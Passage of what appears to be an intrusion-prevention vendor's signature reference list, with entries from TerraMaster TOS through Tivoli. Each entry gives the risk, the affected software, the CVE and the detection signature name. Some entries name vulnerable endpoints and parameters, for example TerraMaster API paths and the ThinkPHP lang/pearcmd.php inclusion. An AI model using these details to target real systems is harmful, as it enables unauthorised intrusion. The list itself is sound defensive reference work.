An attempt to exploit a vulnerability in TerraMaster TOS detected

Risk:

High

First detected in:

sgpkg-ips-1624-5242

Last changed:

sgpkg-ips-1624-5242

Platform:

Unix; Linux

Software:

TerraMaster TOS

Type:

Insecure Configuration

Description:

TerraMaster OS 4.2.29 and earlier allows remote attackers to obtain a REQUESTCODE without authentication and perform OS command injection via the createRaid function.

Situation:

HTTP_CRL-TerraMaster-TOS-Unauthenticated-RCE-CVE-2022-24989

References:

CVE-2022-24989
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-24989

TerraMaster-Unauthenticated-RCE-Chain-CVE-2021-45837

About this vulnerability:

An attempt to exploit a vulnerability TerraMaster TOS detected

Risk:

High

First detected in:

sgpkg-ips-1626-5242

Last changed:

sgpkg-ips-1626-5242

Platform:

Unix;Linux

Software:

TerraMaster TOS

Type:

Input Validation

Description:

A vulnerability in TerraMaster TOS, versions 4.2.15 and before, which allows remote attackers to execute arbitrary commands as root by sending a specifically crafted input to vulnerable endpoint `/tos/index.php?app/del`.

Situation:

HTTP_CRL-TerraMaster-Unauthenticated-RCE-Chain-CVE-2021-45837

References:

CVE-2021-45837
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-45837

TerraMaster-Unauthenticated-RCE-Chain-CVE-2021-45839

About this vulnerability:

An attempt to exploit a vulnerability TerraMaster TOS detected

Risk:

High

First detected in:

sgpkg-ips-1626-5242

Last changed:

sgpkg-ips-1626-5242

Platform:

Unix;Linux

Software:

TerraMaster TOS

Type:

Insecure Configuration

Description:

A vulnerability in TerraMaster TOS, versions 4.2.15 and before, which allows remote attackers to obtain the first administrator's hash set up on the system as well as other information such as MAC address, by performing a request to the `/module/api.php?mobile/webNasIPS` endpoint.

Situation:

HTTP_CSU-TerraMaster-Unauthenticated-RCE-Chain-CVE-2021-45839

References:

CVE-2021-45839
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-45839

TerraMaster-Unauthenticated-RCE-Chain-CVE-2021-45841

About this vulnerability:

An attempt to exploit a vulnerability TerraMaster TOS detected

Risk:

High

First detected in:

sgpkg-ips-1626-5242

Last changed:

sgpkg-ips-1626-5242

Platform:

Unix;Linux

Software:

TerraMaster TOS

Type:

Input Validation

Description:

A vulnerability in TerraMaster TOS, versions 4.2.15 and before, which allows remote attackers to craft an unauthenticated admin session and obtain sensitive system information.

Situation:

HTTP_CRL-TerraMaster-Unauthenticated-RCE-Chain-CVE-2021-45841

References:

CVE-2021-45841
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-45841

TerraMaster_TOS_Remote_Code_Execution_CVE-2020-28188

About this vulnerability:

A vulnerability in TerraMaster TOS

Risk:

Moderate

First detected in:

sgpkg-ips-1350-5242

Last changed:

sgpkg-ips-1626-5242

Platform:

Generic

Software:

TerraMaster TOS

Type:

Input Validation

Description:

There exists a remote code execution vulnerability in TerraMaster TOS. Successful exploitation could lead in arbitrary code execution on the target server. CVE-2020-28188 and CVE-2020-35665.

Situation:

HTTP_CSU-TerraMaster_TOS_Remote_Code_Execution_CVE-2020-28188

References:

CVE-2020-28188
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-28188

Texas-Imperial-Software-Wftpd-Buffer-Overflow

About this vulnerability:

A Texas Imperial Software Wftpd Buffer Overflow vulnerability.

Risk:

High

First detected in:

sgpkg-ips-732-5211

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows

Software:

WFTPD

Type:

Buffer Overflow

Description:

A buffer overflow vulnerability in Texas Imperial Software WFTPD serer, version 3.23, which allows remote attackers to execute arbitrary code via a long SIZE command.

Situation:

FTP_CS-Texas-Imperial-Software-Wftpd-Buffer-Overflow

References:

CVE-2006-4318
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-4318

BID-19617
http://www.securityfocus.com/bid/19617

OSVDB-28134
http://www.osvdb.org/28134

TFTP-3Com-TFTP-Server-Transporting-Mode-Remote-Buffer-Overflow

About this vulnerability:

Buffer overflow vulnerability in 3Com TFTP Server

Risk:

High

First detected in:

sgpkg-ips-88-1314

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows

Software:

3Com TFTP Server

Type:

Buffer Overflow

Description:

3Com TFTP Server has a stack-based buffer overflow vulnerability in the handling of the transfer mode string. By sending a crafted Read or Write request to the vulnerable server, a remote attacker can cause a DoS or execute arbitrary code with the privileges of the service process, normally System.

Situation:

TFTP_Trivial-File-Transfer-Protocol-Mode-String-Buffer-Overflow

References:

CVE-2006-6183
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-6183

BID-21301
http://www.securityfocus.com/bid/21301

TFTP-FutureSoft-TFTP-Server-Buffer-Overflow

About this vulnerability:

Buffer overflow vulnerability in FutureSoft TFTP Server

Risk:

High

First detected in:

sgpkg-ips-32-1210

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows

Software:

FutureSoft TFTP Server 2000

Type:

Buffer Overflow

Description:

FutureSoft TFTP Server 2000 provides a TFTP (Trivial File Transfer Protocol) service on Windows platform. The evaluation version 1.0.0.1 of FutureSoft TFTP Server has a buffer overflow vulnerability in the handling of filename and transfer mode string. Remote attacker can exploit this vulnerability to execute arbitrary code on the victim server.

Situation:

TFTP_Read-Or-Write-Request-Excessively-Long-Filename
TFTP_Trivial-File-Transfer-Protocol-Mode-String-Buffer-Overflow

References:

CVE-2005-1812
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-1812

BID-13821
http://www.securityfocus.com/bid/13821

OSVDB-16954
http://www.osvdb.org/16954

TFTP-FutureSoft-TFTP-Server-Directory-Traversal

About this vulnerability:

Directory traversal vulnerability in FutureSoft TFTP Server

Risk:

Moderate

First detected in:

sgpkg-ips-32-1210

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows

Software:

FutureSoft TFTP Server 2000

Type:

Directory Traversal

Description:

FutureSoft TFTP Server 2000 provides a TFTP (Trivial File Transfer Protocol) service on Windows platform. The evaluation version 1.0.0.1 of FutureSoft TFTP Server has a directory traversal vulnerability in the handling of requested files. Remote attacker can exploit this vulnerability to read arbitrary files on the victim server.

Situation:

TFTP_Trivial-File-Transfer-Protocol-Directory-Traversal

References:

CVE-2005-1813
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-1813

BID-13821
http://www.securityfocus.com/bid/13821

TFTP-Microsoft-RIS-TFTP-Service-Write-Access-Vulnerability

About this vulnerability:

RIS TFTP Service allows anonymous remote write access by default

Risk:

High

First detected in:

sgpkg-ips-87-1314

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows

Software:

Microsoft RIS TFTP Server

Type:

Insecure Configuration

Description:

There is a file overwrite vulnerability in the Microsoft Windows Remote Installation Service. The Remote Installation Service (RIS) includes a TFTP server that is configured by default to allow anonymous users to update and overwrite files. This vulnerability allows an attacker to compromise operating installs offered by the RIS server.

Situation:

TFTP_Microsoft-RIS-TFTP-Write-Access

References:

CVE-2006-5584
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-5584

BID-21495
http://www.securityfocus.com/bid/21495

MS06-077
http://technet.microsoft.com/security/bulletin/MS06-077

TFTP-TFTP-Server-Error-Packet-Handling-Buffer-Overflow

About this vulnerability:

Buffer overflow vulnerability in TFTP Server

Risk:

High

First detected in:

sgpkg-ips-158-2032

Last changed:

sgpkg-ips-1296-5242

Platform:

Any Operating System

Software:

TFTP Server SP

Type:

Buffer Overflow

Description:

There is a buffer overflow vulnerability in TFTP Server. By sending a malicious TFTP ERROR packet with an excessively long ErrMsg string, a remote unauthenticated attacker can compromise the vulnerable system.

Situation:

TFTP_TFTP-Server-Error-Packet-Handling-Buffer-Overflow

References:

CVE-2008-2161
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-2161

BID-29111
http://www.securityfocus.com/bid/29111

OSVDB-44904
http://www.osvdb.org/44904

TFTP-TFTP-Server-SP-Long-Filename-Buffer-Overflow

About this vulnerability:

Buffer overflow vulnerability in TFTP Server SP

Risk:

High

First detected in:

sgpkg-ips-151-2032

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows

Software:

TFTP Server SP

Type:

Buffer Overflow

Description:

TFTP Server SP has a buffer overflow vulnerability in the handling of excessively long filenames in a TFTP read or write request. A remote attacker can exploit this vulnerability to cause a denial of service or execute arbitrary code on the victim server.

Situation:

TFTP_Read-Or-Write-Request-Excessively-Long-Filename

References:

CVE-2008-1611
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-1611

BID-28462
http://www.securityfocus.com/bid/28462

OSVDB-43785
http://www.osvdb.org/43785

TFTP-Usage

About this vulnerability:	TFTP usage detection
Risk:	Low
First detected in:	sgpkg-ips-39-1210
Last changed:	sgpkg-ips-1296-5242
Platform:	Generic
Software:	Generic TFTP server
Type:	Remote Control
Description:	This vulnerability is referenced by fingerprints that detect TFTP file transfers. TFTP, Trivial File Transfer Protocol, is a simple but widely used file transfer protocol. Because of the simple implementation, many worms and bots use TFTP to distribute their payload after a successful exploit. Unexpected TFTP traffic inside a network may indicate worm propagation.
Situation:	Shared-UDP_TFTP-Usage

TFTP32d-Format-String-Vulnerbility

About this vulnerability:

Format String vulnerability in TFTP32d

Risk:

High

First detected in:

sgpkg-ips-349-4219

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

TFTP32d

Type:

Format String

Description:

TFTP32d v2.81 ha a format string vulnerability that allows remote code execution.

Situation:

TFTP_TFTP32d-Format-String-Vulnerability-Poc
TFTP_TFTP32d-Format-String-Vulnerability

References:

CVE-2006-0328
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-0328

BID-16333
http://www.securityfocus.com/bid/16333

OSVDB-22661
http://www.osvdb.org/22661

Tftpd32-DNS-Server-Buffer-Overflow

About this vulnerability:

A vulnerability in Philippe Jounin TFTPD32

Risk:

High

First detected in:

sgpkg-ips-455-5211

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

TFTPD32

Type:

Input Validation

Description:

A buffer overflow has been reported in Tftpd32's DNS component. The vulnerability is due to an error in processing domain labels. A remote, unauthenticated attacker can exploit this vulnerability by sending a malicious DNS frame to an affected server. A successful exploitation attempt may result in the execution of arbitrary code in the security context of the Tftpd32 server. An unsuccessful attack attempt can result in a denial-of-service condition.

Situation:

DNS_Protocol_Violation

References:

OSVDB-82489
http://www.osvdb.org/82489

Tftpd32-Long-Filename-Buffer-Overflow

About this vulnerability:

A Tftpd32 Long Filename Buffer Overflow vulnerability.

Risk:

High

First detected in:

sgpkg-ips-735-5211

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows

Software:

TFTPD32

Type:

Buffer Overflow

Description:

A buffer overflow vulnerability in TFTPD32, version 2.21, which allows remote attacker to execute arbitrary code via a long filename argument.

Situation:

TFTP_Read-Or-Write-Request-Excessively-Long-Filename

References:

CVE-2002-2226
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2002-2226

BID-6199
http://www.securityfocus.com/bid/6199

OSVDB-45903
http://www.osvdb.org/45903

TFTP_CS-HP-Intelligent-Management-Center-TFTP-Server-Data-And-Error-Packet-BOF

About this vulnerability:

An attempt to exploit vulnerability in HP Intelligent Management Center detected

Risk:

High

First detected in:

sgpkg-ips-391-4219

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows

Software:

HP Intelligent Management Center

Type:

Buffer Overflow

Description:

A vulnerability has been identified in a component of the HP Intelligent Management Center (tftpserver.exe). When processing DATA or ERROR TFTP packets, user-supplied data is copied into a fixed length buffer, allowing an attacker to overwrite data on the stack.

Situation:

TFTP_CS-HP-Intelligent-Management-Center-TFTP-Server-Data-And-Error-Packet-BOF

References:

CVE-2011-1852
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-1852

BID-47789
http://www.securityfocus.com/bid/47789

TFTP_CS-HP-Intelligent-Management-Center-TFTP-Server-Mode-RemoteCodeExec

About this vulnerability:

An attempt to exploit vulnerability in HP Intelligent Management Center detected

Risk:

High

First detected in:

sgpkg-ips-391-4219

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows

Software:

HP Intelligent Management Center

Type:

Buffer Overflow

Description:

A vulnerability has been identified in a component of the HP Intelligent Management Center (tftpserver.exe). When processing the MODE field, user input is copied to a buffer on the stack without properly checking its length first, allowing an attacker to overwrite data on the stack.

Situation:

TFTP_CS-HP-Intelligent-Management-Center-TFTP-Server-Mode-RemoteCodeExec

References:

CVE-2011-1851
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-1851

BID-47789
http://www.securityfocus.com/bid/47789

Thanksgiving-iTunes-Malware

About this vulnerability:	Thanksgiving iTunes Malware
Risk:	High
First detected in:	sgpkg-ips-619-5211
Last changed:	sgpkg-ips-1296-5242
Platform:	Windows
Software:	<os>
Type:	Code Injection
Description:	Thanksgiving iTunes malware is spread by fake iTunes gift certificates. It can create a backdoor on the infected machine and try to capture user information, such as passwords.
Situation:	HTTP_CSU-Thanksgiving-iTunes-Malware

ThiefQuest-C2-Traffic

About this vulnerability:	ThiefQuest C2 traffic was detected
Risk:	High
First detected in:	sgpkg-ips-1263-5242
Last changed:	sgpkg-ips-1296-5242
Platform:	Mac OS
Software:	<os>
Type:	Backdoor
Description:	ThiefQuest, also known as EvilQuest, is a macOS malware with data exfiltration, file encryption and keylogging capabilities.
Situation:	HTTP_CS-ThiefQuest-C2-Traffic

ThinkAdmin-ModuleService.php-checkAllowDownload-Directory-Traversal

About this vulnerability:

A vulnerability in ThinkAdmin

Risk:

High

First detected in:

sgpkg-ips-1292-5242

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

ThinkAdmin

Type:

Directory Traversal

Description:

There exists a vulnerability in ThinkAdmin, versions before 6.0.4, which allows remote attackers to read arbitrary files on the target server by sending a crafted request, due to the insufficient validation on the file paths by function checkAllowDownload() in ModuleService.php script.

Situation:

HTTP_CSU_hinkAdmin-ModuleService.php-checkAllowDownload-Directory-Traversal

References:

CVE-2020-25540
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-25540

ThinkPHP-Local-File-Inclusion-CVE-2022-47945

About this vulnerability:

An attempt to exploit a vulnerability in ThinkPHP detected

Risk:

High

First detected in:

sgpkg-ips-1774-5242

Last changed:

sgpkg-ips-1774-5242

Platform:

Generic

Software:

ThinkPHP

Type:

Input Validation

Description:

ThinkPHP framework before 6.0.14 allows local file inclusion via the "lang" parameter when the language pack feature is enabled (lang_switch_on=true). An unauthenticated and remote attacker can exploit this to execute arbitrary operating system commands, as demonstrated by including pearcmd.php.

Situation:

HTTP_CSU-ThinkPHP-Local-File-Inclusion-CVE-2022-47945
HTTP_CSH-ThinkPHP-Local-File-Inclusion-CVE-2022-47945

References:

CVE-2022-47945
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-47945

ThinkPHP-RCE-Vulnerability-CVE-2018-20062

About this vulnerability:

A vulnerability in ThinkPHP

Risk:

High

First detected in:

sgpkg-ips-1138-5242

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

ThinkPHP

Type:

Malfunction

Description:

There has been reported a remote code execution vulnerability in ThinkPHP. Successful exploitation can lead in remote code execution.

Situation:

HTTP_CRL-ThinkPHP-RCE-Vulnerability-CVE-2018-20062

References:

CVE-2018-20062
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-20062

ThinkPHP-Remote-Code-Execution

About this vulnerability:

ThinkPHP Remote Code Execution

Risk:

Moderate

First detected in:

sgpkg-ips-1321-5242

Last changed:

sgpkg-ips-1321-5242

Platform:

Generic

Software:

ThinkPHP

Type:

Malfunction

Description:

A command injection vulnerability in ThinkPHP

Situation:

HTTP_CS_ThinkPHP-Remote-Code-Execution

References:

CVE-2019-9082
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-9082

ThinVNC-Directory-Traversal

About this vulnerability:

A vulnerability in ThinVNC

Risk:

High

First detected in:

sgpkg-ips-1199-5242

Last changed:

sgpkg-ips-1638-5242

Platform:

Windows

Software:

ThinVNC

Type:

Directory Traversal

Description:

A vulnerability in ThinVNC, versions 1.0b1 and before, which allows remote attackers to retrieve arbitrary files via directory traversal.

References:

CVE-2019-17662
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-17662

Thomson-TWG850-4-Unauthenticated-Backup-File-Access

About this vulnerability:

A vulnerability in Thomson TWG850-4

Risk:

High

First detected in:

sgpkg-ips-609-5211

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

Thomson TWG850-4

Type:

Malfunction

Description:

Thomson TWG850-4 has a vulnerability which allows unauthenticated access to its backup file.

Situation:

HTTP_CSU-Thomson-TWG850-4-Unauthenticated-Backup-File-Access

References:

OSVDB-85791
http://www.osvdb.org/85791

Tidserv-Bot

About this vulnerability:	Tidserv Bot
Risk:	High
First detected in:	sgpkg-ips-619-5211
Last changed:	sgpkg-ips-1296-5242
Platform:	Windows
Software:	<os>
Type:	Code Injection
Description:	Tidserv is a Trojan that opens a backdoor on the infected machine.
Situation:	HTTP_CSU-Tidserv-Bot-Traffic

Tightvnc-Vncviewer-HandleCoRREBPP-Global-Buffer-Overflow

About this vulnerability:

A vulnerability in TightVNC vncviewer

Risk:

High

First detected in:

sgpkg-ips-1212-5242

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

TightVNC

Type:

Buffer Overflow

Description:

There exists a buffer overflow vulnerability in TightVNC vncviewer, version 1.3.10, which allows remote attackers to execute arbitrary code on the target user's machine by sending a maliciously crafted FramebufferUpdate message, due to improper handling of FramebufferUpdate messages.

Situation:

RFB_SS-Tightvnc-Vncviewer-HandleCoRREBPP-Global-Buffer-Overflow

References:

CVE-2019-8287
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-8287

Tightvnc-Vncviewer-InitialiseRFBConnection-Heap-Buffer-Overflow

About this vulnerability:

A vulnerability in TightVNC.

Risk:

High

First detected in:

sgpkg-ips-1439-5242

Last changed:

sgpkg-ips-1439-5242

Platform:

Linux;Windows

Software:

TightVNC

Type:

Buffer Overflow

Description:

A heap buffer overflow vulnerability in TightVNC, version 1.3.10, which allows remote attackers to execute arbitrary code by sending a maliciously crafted message to the target user, due to missing integer value validation in InitialiseRFBConnection in rfbproto.c.

Situation:

Generic_TCP-Tightvnc-Vncviewer-InitialiseRFBConnection-Heap-Buffer-Overflow

References:

CVE-2022-23967
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-23967

Tightvnc-Vncviewer-Rfbservercuttext-Handler-Integer-Overflow

About this vulnerability:

A vulnerability in TightVNC

Risk:

Moderate

First detected in:

sgpkg-ips-1205-5242

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

TightVNC

Type:

Integer Overflow

Description:

Improper handling of ServerCutText messages sent by a VNC server causes an integer overflow vulnerability in TightVNC viewer. A successful exploit may allow an attacker to execure arbitrary code on the with the privileges of the viewer program.

Situation:

RFB_SS-Tightvnc-Vncviewer-Rfbservercuttext-Handler-Integer-Overflow

References:

CVE-2019-15678
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-15678

Tiki-Wiki-PHP-Code-Execution

About this vulnerability:

A Tiki Wiki PHP Code Execution vulnerability.

Risk:

High

First detected in:

sgpkg-ips-709-5211

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

TikiWiki

Type:

Input Validation

Description:

An input validation vulnerability in Tiki Wiki, versions before 8.4, which allows remote attackers to execute arbitrary PHP code, via a crafted serialized object in the cookieName parameter to lib/banners/bannerlib.php, printpages or printstructures parameters to tiki-print_multi_pages.php or tiki-print_pages.php, or the sendpages sendstructures or sendarticles parameters to tiki-send_objects.php.

Situation:

HTTP_CRL-Tiki-Wiki-PHP-Code-Execution

References:

CVE-2012-0911
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-0911

BID-54298
http://www.securityfocus.com/bid/54298

OSVDB-83534
http://www.osvdb.org/83534

TikiWiki-Admin-Authentication-Bypass-CVE-2020-15906

About this vulnerability:

An attempt to exploit a vulnerability in TikiWiki detected

Risk:

High

First detected in:

sgpkg-ips-1852-5242

Last changed:

sgpkg-ips-1852-5242

Platform:

Generic

Software:

TikiWiki

Type:

Input Validation

Description:

"tiki-login.php" in TikiWiki before 21.2 sets the admin password to a blank value after 50 invalid login attempts.

Situation:

HTTP_CRL-TikiWiki-Admin-Authentication-Bypass-CVE-2020-15906

References:

CVE-2020-15906
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-15906

TikiWiki-Information-Disclosure

About this vulnerability:

A TikiWiki Information Disclosure vulnerability.

Risk:

Moderate

First detected in:

sgpkg-ips-732-5211

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

TikiWiki

Type:

Input Validation

Description:

A vulnerability in TikiWiki, version 1.9.5, which allows remote attackers to obtain sensitive information via an empty sort_mode parameter, in multiple php functions, which reveal the information in certain database error messages.

Situation:

HTTP_CS-TikiWiki-Information-Disclosure

References:

CVE-2006-5702
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-5702

BID-20858
http://www.securityfocus.com/bid/20858

OSVDB-30172
http://www.osvdb.org/30172

TikiWiki-Tiki-Graph-Formula-Command-Execution

About this vulnerability:

A vulnerability in TikiWiki

Risk:

High

First detected in:

sgpkg-ips-309-4219

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

TikiWiki

Type:

Input Validation

Description:

There is a vulnerability in TikiWiki. The vulnerability is due to an insufficient input validation in tiki-graph_formula.php, leading to execution of arbitary PHP statements in the context of the web server.

Situation:

HTTP_CRL-TikiWiki-Tiki-Graph-Formula-Command-Execution

References:

CVE-2007-5423
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-5423

BID-26006
http://www.securityfocus.com/bid/26006

OSVDB-40478
http://www.osvdb.org/40478

Timbuktu-Pro-Directory-Traversal

About this vulnerability:

A Timbuktu Pro Directory Traversal vulnerability.

Risk:

High

First detected in:

sgpkg-ips-737-5211

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows;Mac OS X

Software:

Timbuktu Pro

Type:

Directory Traversal

Description:

A vulnerability in Timbuktu Pro, version 8.6.5 for Windows and possibly 8.7 for Mac OS X, which allows remote attackers to upload files to arbitrary locations, which can be leveraged for code execution, via a destination filename with a backslash character followed by a dot dot slash sequence.

Situation:

Generic_CS-Timbuktu-Pro-Directory-Traversal

References:

CVE-2008-1117
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-1117

OSVDB-43544
http://www.osvdb.org/43544

Tinba-Bot

About this vulnerability:	Tinba Bot
Risk:	High
First detected in:	sgpkg-ips-619-5211
Last changed:	sgpkg-ips-1296-5242
Platform:	Windows
Software:	<os>
Type:	Code Injection
Description:	Tinba is a Trojan Bot. It's purpose is to steal banking and credit card information from the infected machine.
Situation:	HTTP_CS-Tinba-Bot-Traffic File-Binary_Tinba-Botnet-Traffic

Tinyfilemanager.php-Fullpath-Directory-Traversal

About this vulnerability:

A vulnerability in Tiny File Manager Tiny File Manager

Risk:

Moderate

First detected in:

sgpkg-ips-1451-5242

Last changed:

sgpkg-ips-1451-5242

Platform:

Generic

Software:

Tiny File Manager

Type:

Directory Traversal

Description:

Insufficient validation of the fullpath parameter during file upload operations causes a directory traversal vulnerability in Tiny File Manager. A successful exploit allows an attacker to upload files to arbitrary paths and execute arbitrary code on the target system.

Situation:

HTTP_CS-Tinyfilemanager.php-Fullpath-Directory-Traversal

References:

CVE-2021-45010
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-45010

TinyIdentD-2.2-Stack-Buffer-Overflow

About this vulnerability:

TinyIdentD 2.2 Stack Buffer Overflow

Risk:

High

First detected in:

sgpkg-ips-647-5211

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows

Software:

TinyIdentD

Type:

Buffer Overflow

Description:

A stack based buffer overflow vulnerability in TinyIdentD 2.2 which allows attackers to remotly execute arbitrary code via a long string over TCP 113.

Situation:

Generic_CS-TinyIdentD-2.2-Stack-Buffer-Overflow

References:

CVE-2007-2711
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-2711

BID-23981
http://www.securityfocus.com/bid/23981

OSVDB-36053
http://www.osvdb.org/36053

TinyNuke-Malware-C2-Traffic

About this vulnerability:	TinyNuke malware C2 traffic was detected
Risk:	High
First detected in:	sgpkg-ips-1136-5242
Last changed:	sgpkg-ips-1296-5242
Platform:	Windows
Software:	<os>
Type:	Backdoor
Description:	TinyNuke, also known as Nuclear Bot, is a banking trojan with web inject and stealer functionalities. It also has a module to support VNC connections.
Situation:	HTTP_CS-TinyNuke-Malware-C2-Traffic

Tinyproxy-HTTP-Connection-Headers-Use-After-Free

About this vulnerability:

An attempt to exploit a vulnerability in Tinyproxy detected

Risk:

High

First detected in:

sgpkg-ips-1747-5242

Last changed:

sgpkg-ips-1747-5242

Platform:

Linux

Software:

Tinyproxy

Type:

Use-after-free

Description:

A vulnerability in Tinyproxy, versions prior to 1.11.2, which allows remote attackers to execute arbitrary code or cause a denial of service condition by sending crafted requests or responses, due to a user-after-free when parsing HTTP connection headers.

Situation:

HTTP_SHS-Tinyproxy-HTTP-Connection-Headers-Use-After-Free
HTTP_CSH-Tinyproxy-HTTP-Connection-Headers-Use-After-Free

References:

CVE-2023-49606
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-49606

Tinyproxy-HTTP-Connection-Headers-Use-After-Free-CVE-2023-49606

About this vulnerability:

An attempt to exploit a vulnerability in Tinyproxy detected

Risk:

High

First detected in:

sgpkg-ips-1724-5242

Last changed:

sgpkg-ips-1724-5242

Platform:

Generic

Software:

Tinyproxy

Type:

Input Validation

Description:

A use-after-free vulnerability exists in the HTTP Connection Headers parsing in Tinyproxy 1.11.1 and Tinyproxy 1.10.0. A specially crafted HTTP header can trigger reuse of previously freed memory, which leads to memory corruption and could lead to remote code execution. An attacker needs to make an unauthenticated HTTP request to trigger this vulnerability.

Situation:

HTTP_CSH-Tinyproxy-HTTP-Connection-Headers-Use-After-Free-CVE-2023-49606

References:

CVE-2023-49606
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-49606

TIP-Microsoft-Distributed-Transaction-Controller-Primary-Node-DoS

About this vulnerability:

Denial of service vulnerability in MSDTC TIP implementation

Risk:

Moderate

First detected in:

sgpkg-ips-43-1210

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows

Software:

Microsoft Distributed Transaction Controller

Type:

Malfunction

Description:

Microsoft Distributed Transaction Controller (MSDTC) has a denial-of-service vulnerability in its TIP implementation. A remote attacker can connect to MSDTC, which is by default listening on port 3372/tcp, and instruct the vulnerable server to connect to an attacker-controlled server. When the attacker-controlled server gives an out-of-context reply during the transaction, the vulnerable service will terminate causing a DoS. Patched versions of Windows do not open the TIP port 3372/tcp by default, as the service should only be used between trusted hosts.ult, as the service should only be used between trusted hosts.

Situation:

Generic_TIP-Microsoft-Distributed-Transaction-Controller-Primary-Node-DoS

References:

CVE-2005-1979
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-1979

BID-15058
http://www.securityfocus.com/bid/15058

MS05-051
http://technet.microsoft.com/security/bulletin/MS05-051

TippingPoint-Ips-Reverse-DNS-Lookup-Format-String

About this vulnerability:	A vulnerability in TippingPoint IPS
Risk:	High
First detected in:	sgpkg-ips-1351-5242
Last changed:	sgpkg-ips-1351-5242
Platform:	Generic
Software:	TippingPoint IPS
Type:	Input Validation
Description:	There exists a vulnerability in the TippingPoint IPS command line management interface when performing reverse DNS lookups using the ping utility, which could possibly allow remote attackers to execute arbitrary code.
Situation:	DNS-UDP_TippingPoint-Ips-Reverse-DNS-Lookup-Format-String

Titan-FTP-Server-Denial-Of-Service

About this vulnerability:

A Titan FTP Server Denial Of Service vulnerability.

Risk:

Moderate

First detected in:

sgpkg-ips-758-5211

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows

Software:

Titan FTP Server

Type:

Malfunction

Description:

A vulnerability in Titan FTP Server, version 6.26 build 630, which allows remote attackers to cause a denial of service condition by sending a SITE WHO command.

Situation:

FTP_CS-Titan-FTP-Server-Denial-Of-Service

References:

CVE-2008-6082
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-6082

OSVDB-49177
http://www.osvdb.org/49177

Titan-MFT-Admin-Interface-Path-Traversal-CVE-2023-45689

About this vulnerability:

An attempt to exploit a vulnerability in Titan MFT Server detected

Risk:

High

First detected in:

sgpkg-ips-1701-5242

Last changed:

sgpkg-ips-1701-5242

Platform:

Generic

Software:

Titan MFT Server

Type:

Input Validation

Description:

Lack of sufficient path validation in South River Technologies' Titan MFT and Titan SFTP servers on Windows and Linux allows an authenticated attacker with administrative privileges to read any file on the filesystem via path traversal.

Situation:

File-Text_Titan-MFT-Admin-Interface-Path-Traversal-CVE-2023-45689

References:

CVE-2023-45689
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-45689

Titan-MFT-Server-Path-Traversal-Via-WebDAV-CVE-2023-45686

About this vulnerability:

An attempt to exploit a vulnerability in Titan MFT Server detected

Risk:

High

First detected in:

sgpkg-ips-1701-5242

Last changed:

sgpkg-ips-1701-5242

Platform:

Generic

Software:

Titan MFT Server

Type:

Input Validation

Description:

Insufficient path validation when writing a file via WebDAV in South River Technologies' Titan MFT and Titan SFTP servers on Linux allows an authenticated attacker to write a file to any location on the filesystem via path traversal.

Situation:

HTTP_CSU-Titan-MFT-Server-Path-Traversal-Via-WebDAV-CVE-2023-45686

References:

CVE-2023-45686
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-45686

Tivoli-Endpoint-Buffer-Overflow

About this vulnerability:

